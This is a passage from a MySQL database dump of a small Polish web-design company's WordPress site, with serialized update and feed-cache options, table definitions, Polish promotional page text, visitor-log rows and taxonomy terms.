le-trackback-validation/simple-trackback-validation.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:3:\"551\";s:4:\"slug\";s:27:\"simple-trackback-validation\";s:6:\"plugin\";s:59:\"simple-trackback-validation/simple-trackback-validation.php\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/simple-trackback-validation/\";s:7:\"package\";s:74:\"https://downloads.wordpress.org/plugin/simple-trackback-validation.2.1.zip\";}s:29:\"widget-logic/widget_logic.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"2545\";s:4:\"slug\";s:12:\"widget-logic\";s:6:\"plugin\";s:29:\"widget-logic/widget_logic.php\";s:11:\"new_version\";s:4:\"0.57\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/widget-logic/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/widget-logic.0.57.zip\";}}}','yes'),(29601,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1472740352;s:7:\"checked\";a:7:{s:13:\"happy-cyclope\";s:3:\"1.0\";s:6:\"pc-one\";s:3:\"1.0\";s:12:\"twentyeleven\";s:3:\"1.5\";s:13:\"twentyfifteen\";s:3:\"1.0\";s:14:\"twentyfourteen\";s:3:\"1.3\";s:9:\"twentyten\";s:3:\"1.4\";s:12:\"twentytwelve\";s:3:\"1.1\";}s:8:\"response\";a:5:{s:12:\"twentyeleven\";a:4:{s:5:\"theme\";s:12:\"twentyeleven\";s:11:\"new_version\";s:3:\"2.5\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentyeleven/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentyeleven.2.5.zip\";}s:13:\"twentyfifteen\";a:4:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.1.6.zip\";}s:14:\"twentyfourteen\";a:4:{s:5:\"theme\";s:14:\"twentyfourteen\";s:11:\"new_version\";s:3:\"1.8\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentyfourteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentyfourteen.1.8.zip\";}s:9:\"twentyten\";a:4:{s:5:\"theme\";s:9:\"twentyten\";s:11:\"new_version\";s:3:\"2.2\";s:3:\"url\";s:39:\"https://wordpress.org/themes/twentyten/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/twentyten.2.2.zip\";}s:12:\"twentytwelve\";a:4:{s:5:\"theme\";s:12:\"twentytwelve\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwelve/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwelve.2.1.zip\";}}s:12:\"translations\";a:0:{}}','yes'),(29588,'_transient_timeout_feed_08a9370cca8e4bda25c11f8557e93830','1472864429','no'),(29589,'_transient_feed_08a9370cca8e4bda25c11f8557e93830','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:23:\"\n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Google Sitemap Generator Support Topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Google Sitemap Generator Support Topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Wed, 02 Jul 2014 7:54:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:3:{i:0;a:6:{s:4:\"data\";s:19:\"\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:4:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"Common error messages in Google Webmaster Tools\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://www.arnebrachhold.de/redir/sitemap-feed-gwterrs/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"C2VZYxeTESzcCF2IhS13\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Apr 2014 00:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:19:\"\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:4:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"How to move your sitemap to the root of your domain\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://www.arnebrachhold.de/redir/sitemap-feed-movesm/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"C2VZYxeTESzcCF2IhS12\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 27 Apr 2014 00:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:19:\"\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:4:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"Introducing a new format for your sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://www.arnebrachhold.de/redir/sitemap-feed-newformat/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"C2VZYxeTESzcCF2IhS1l\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Apr 2014 00:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:11:{s:4:\"date\";s:29:\"Sat, 27 Aug 2016 01:00:29 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=utf-8\";s:10:\"connection\";s:5:\"close\";s:10:\"set-cookie\";s:133:\"__cfduid=d3c186e341c883a534165589b16dc8d7b1472259629; expires=Sun, 27-Aug-17 01:00:29 GMT; path=/; domain=.arnebrachhold.de; HttpOnly\";s:13:\"cache-control\";s:23:\"public, max-age=2678400\";s:13:\"last-modified\";s:29:\"Wed, 02 Jul 2014 19:54:35 GMT\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:15:\"cf-cache-status\";s:3:\"HIT\";s:7:\"expires\";s:29:\"Tue, 27 Sep 2016 01:00:29 GMT\";s:6:\"server\";s:16:\"cloudflare-nginx\";s:6:\"cf-ray\";s:20:\"2d8b963ec3591515-CDG\";}s:5:\"build\";s:14:\"20131110092314\";}','no'),(29558,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:6:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.6.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.6.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-4.6-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-4.6-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"4.6\";s:7:\"version\";s:3:\"4.6\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.6.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.6.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-4.6-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-4.6-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"4.6\";s:7:\"version\";s:3:\"4.6\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":12:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.5.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.5.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.5.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.5.3-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.5.3\";s:7:\"version\";s:5:\"4.5.3\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:12:\"notify_email\";s:1:\"1\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.4.4.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.4.4.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.4.4-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.4.4-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.4.4\";s:7:\"version\";s:5:\"4.4.4\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.3.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.3.5.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.3.5-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.3.5-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.3.5\";s:7:\"version\";s:5:\"4.3.5\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:5;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.2.9.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.2.9.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.2.9-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.2.9-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.2.9\";s:7:\"version\";s:5:\"4.2.9\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1472740347;s:15:\"version_checked\";s:6:\"4.1.12\";s:12:\"translations\";a:0:{}}','yes'); /*!40000 ALTER TABLE `w_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_postmeta` -- DROP TABLE IF EXISTS `w_postmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_postmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `post_id` bigint(20) unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `post_id` (`post_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=26 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_postmeta` -- LOCK TABLES `w_postmeta` WRITE; /*!40000 ALTER TABLE `w_postmeta` DISABLE KEYS */; INSERT INTO `w_postmeta` VALUES (15,9,'_wp_page_template','default'),(13,9,'_edit_last','1'),(14,9,'_edit_lock','1300203725:1'),(22,25,'_edit_last','1'),(23,25,'_edit_lock','1304072317:1'); /*!40000 ALTER TABLE `w_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_posts` -- DROP TABLE IF EXISTS `w_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_posts` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `post_author` bigint(20) unsigned NOT NULL DEFAULT '0', `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content` longtext NOT NULL, `post_title` text NOT NULL, `post_excerpt` text NOT NULL, `post_status` varchar(20) NOT NULL DEFAULT 'publish', `comment_status` varchar(20) NOT NULL DEFAULT 'open', `ping_status` varchar(20) NOT NULL DEFAULT 'open', `post_password` varchar(20) NOT NULL DEFAULT '', `post_name` varchar(200) NOT NULL DEFAULT '', `to_ping` text NOT NULL, `pinged` text NOT NULL, `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content_filtered` longtext NOT NULL, `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0', `guid` varchar(255) NOT NULL DEFAULT '', `menu_order` int(11) NOT NULL DEFAULT '0', `post_type` varchar(20) NOT NULL DEFAULT 'post', `post_mime_type` varchar(100) NOT NULL DEFAULT '', `comment_count` bigint(20) NOT NULL DEFAULT '0', PRIMARY KEY (`ID`), KEY `post_name` (`post_name`), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`), FULLTEXT KEY `yarpp_title` (`post_title`), FULLTEXT KEY `yarpp_content` (`post_content`) ) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_posts` -- LOCK TABLES `w_posts` WRITE; /*!40000 ALTER TABLE `w_posts` DISABLE KEYS */; INSERT INTO `w_posts` VALUES (9,1,'2011-03-15 15:42:05','2011-03-15 15:42:05','Obecnie wszystko można znaleźć w Internecie i nawet mówi się, że nie istnieje to, czego nie można znaleźć w sieci. Ale aby zaistnieć w Internecie, trzeba figurować na jakiejś stronie, bowiem strona internetowa to najkrótsza i najszybsza droga dotarcia do jak największej ilości odbiorców czy klientów. To także najskuteczniejsza metoda promocji, nieważne czy własnej czy danej firmy lub instytucji.\r\n\r\nJeśli ktoś takiej strony nie ma, to należy ją stworzyć od podstaw. A więc najpierw trzeba mieć pomysł na stronę a następnie trzeba ją zaprojektować, aby móc wytworzyć coś wartościowego. Strona musi być nie tylko wyczerpująca merytorycznie, ale musi być także atrakcyjna wizualnie, aby przyciągnąć do siebie rzesze odwiedzających.\r\n\r\nNie każdy jednak potrafi stworzyć taką stronę. Dlatego oferujemy Wam profesjonalne tworzenie stron internetowych. Dzięki nam stworzycie strony, które pozwolą Wam zaistnieć w Internecie i w całym społeczeństwie sieci.\r\n\r\nPracują u nas jedynie wykwalifikowani informatycy, graficy, projektanci, animatorzy flash oraz web designerzy, którzy postarają się o to, aby każda strona była wyjątkowa, nowoczesna i efektywna. Ponadto od dawna specjalizujemy się w pozycjonowaniu stron a także posiadamy profesjonalne katalogi stron, dzięki czemu strony tworzone przez nas są szybko znajdowane przez wszystkie wyszukiwarki internetowe i jesteśmy dobrze widoczni w sieci. Nasze wiedza i doświadczenie pozwalają nam tworzyć efektowne i profesjonalne strony internetowe.\r\n\r\nPrzekonaj się sam! Zapraszamy do korzystania z naszych usług.','O nas','','publish','open','open','','o-nas','','','2011-03-15 15:42:05','2011-03-15 15:42:05','',0,'http://pc-one.pl/?page_id=9',0,'page','',0),(10,1,'2011-03-15 15:41:59','2011-03-15 15:41:59','Obecnie wszystko można znaleźć w Internecie i nawet mówi się, że nie istnieje to, czego nie można znaleźć w sieci. Ale aby zaistnieć w Internecie, trzeba figurować na jakiejś stronie, bowiem strona internetowa to najkrótsza i najszybsza droga dotarcia do jak największej ilości odbiorców czy klientów. To także najskuteczniejsza metoda promocji, nieważne czy własnej czy danej firmy lub instytucji.\n\nJeśli ktoś takiej strony nie ma, to należy ją stworzyć od podstaw. A więc najpierw trzeba mieć pomysł na stronę a następnie trzeba ją zaprojektować, aby móc wytworzyć coś wartościowego. Strona musi być nie tylko wyczerpująca merytorycznie, ale musi być także atrakcyjna wizualnie, aby przyciągnąć do siebie rzesze odwiedzających.\n\nNie każdy jednak potrafi stworzyć taką stronę. Dlatego oferujemy Wam profesjonalne tworzenie stron internetowych. Dzięki nam stworzycie strony, które pozwolą Wam zaistnieć w Internecie i w całym społeczeństwie sieci.\n\nPracują u nas jedynie wykwalifikowani informatycy, graficy, projektanci, animatorzy flash oraz web designerzy, którzy postarają się o to, aby każda strona była wyjątkowa, nowoczesna i efektywna. Ponadto od dawna specjalizujemy się w pozycjonowaniu stron a także posiadamy profesjonalne katalogi stron, dzięki czemu strony tworzone przez nas są szybko znajdowane przez wszystkie wyszukiwarki internetowe i jesteśmy dobrze widoczni w sieci. Nasze wiedza i doświadczenie pozwalają nam tworzyć efektowne i profesjonalne strony internetowe.\n\nPrzekonaj się sam! Zapraszamy do korzystania z naszych usług.','O nas','','inherit','open','open','','9-revision','','','2011-03-15 15:41:59','2011-03-15 15:41:59','',9,'http://pc-one.pl/9-revision/',0,'revision','',0),(25,1,'2011-04-29 10:18:36','2011-04-29 10:18:36','Tworzenie stron to nasza specjalność. Od podstaw - zaprojektujemy i wykonamy zarówno proste i tanie witryny, jak również duże portale. Nie zapominamy o tym także, jak ważna jest promocja stron. Sam, nawet najbardziej funkcjonalny i ciekawy serwis nie będzie spełniał swojego zadania bez odwiedzających go użytkowników (klientów). Kompleksowo rozwiążemy każde zadanie.','Tworzenie stron','','publish','open','open','','tworzenie-stron','','','2011-04-29 10:18:36','2011-04-29 10:18:36','',0,'http://pc-one.pl/?p=25',0,'post','',0),(26,1,'2011-04-29 10:18:19','2011-04-29 10:18:19','','Tworzenie stron','','inherit','open','open','','25-revision','','','2011-04-29 10:18:19','2011-04-29 10:18:19','',25,'http://pc-one.pl/25-revision/',0,'revision','',0),(28,1,'2011-07-05 14:09:53','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2011-07-05 14:09:53','0000-00-00 00:00:00','',0,'http://pc-one.pl/?p=28',0,'post','',0),(29,1,'2011-07-08 14:36:36','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2011-07-08 14:36:36','0000-00-00 00:00:00','',0,'http://pc-one.pl/?p=29',0,'post','',0); /*!40000 ALTER TABLE `w_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_statpress` -- DROP TABLE IF EXISTS `w_statpress`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_statpress` ( `id` mediumint(9) NOT NULL AUTO_INCREMENT, `date` tinytext, `time` tinytext, `ip` tinytext, `urlrequested` text, `agent` text, `referrer` text, `search` text, `nation` tinytext, `os` tinytext, `browser` tinytext, `searchengine` tinytext, `spider` tinytext, `feed` tinytext, `user` tinytext, `timestamp` tinytext, `threat_score` smallint(6) DEFAULT NULL, `threat_type` smallint(6) DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=116365 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_statpress` -- LOCK TABLES `w_statpress` WRITE; /*!40000 ALTER TABLE `w_statpress` DISABLE KEYS */; INSERT INTO `w_statpress` VALUES (116362,'20160801','07:57:43','91.121.4.161','','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://pomocy.net.pl','','com','Windows NT 4','Internet Explorer','','','','','1470038263',0,0),(116363,'20160827','01:00:29','91.121.4.161','','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://pomocy.net.pl','','com','Windows NT 4','Internet Explorer','','','','','1472259629',0,0),(116364,'20160901','14:32:26','91.121.4.161','','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://pomocy.net.pl','','com','Windows NT 4','Internet Explorer','','','','','1472740346',0,0); /*!40000 ALTER TABLE `w_statpress` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_term_relationships` -- DROP TABLE IF EXISTS `w_term_relationships`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_term_relationships` ( `object_id` bigint(20) unsigned NOT NULL DEFAULT '0', `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0', `term_order` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`object_id`,`term_taxonomy_id`), KEY `term_taxonomy_id` (`term_taxonomy_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_term_relationships` -- LOCK TABLES `w_term_relationships` WRITE; /*!40000 ALTER TABLE `w_term_relationships` DISABLE KEYS */; INSERT INTO `w_term_relationships` VALUES (8,4,0),(9,4,0),(10,4,0),(25,1,0),(11,4,0); /*!40000 ALTER TABLE `w_term_relationships` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_term_taxonomy` -- DROP TABLE IF EXISTS `w_term_taxonomy`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_term_taxonomy` ( `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `term_id` bigint(20) unsigned NOT NULL DEFAULT '0', `taxonomy` varchar(32) NOT NULL DEFAULT '', `description` longtext NOT NULL, `parent` bigint(20) unsigned NOT NULL DEFAULT '0', `count` bigint(20) NOT NULL DEFAULT '0', PRIMARY KEY (`term_taxonomy_id`), UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`), KEY `taxonomy` (`taxonomy`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_term_taxonomy` -- LOCK TABLES `w_term_taxonomy` WRITE; /*!40000 ALTER TABLE `w_term_taxonomy` DISABLE KEYS */; INSERT INTO `w_term_taxonomy` VALUES (1,1,'category','',0,1),(2,2,'link_category','',0,0),(3,3,'link_category','',0,0),(4,4,'link_category','',0,4); /*!40000 ALTER TABLE `w_term_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_terms` -- DROP TABLE IF EXISTS `w_terms`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_terms` ( `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(200) NOT NULL DEFAULT '', `slug` varchar(200) NOT NULL DEFAULT '', `term_group` bigint(10) NOT NULL DEFAULT '0', PRIMARY KEY (`term_id`), KEY `name` (`name`), KEY `slug` (`slug`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_terms` -- LOCK TABLES `w_terms` WRITE; /*!40000 ALTER TABLE `w_terms` DISABLE KEYS */; INSERT INTO `w_terms` VALUES (1,'Bez kategorii','bez-kategorii',0),(2,'Blogroll','blogroll',0),(3,'Nasze serwisy','nasze-serwisy',0),(4,'Wykonaliśmy','wykonalismy',0); /*!40000 ALTER TABLE `w_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_usermeta` -- DROP TABLE IF EXISTS `w_usermeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_usermeta` ( `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_id` bigint(20) unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext, PRIMARY KEY (`umeta_id`), KEY `user_id` (`user_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_usermeta` -- LOCK TABLES `w_usermeta` WRITE; /*!40000 ALTER TABLE `w_usermeta` DISABLE 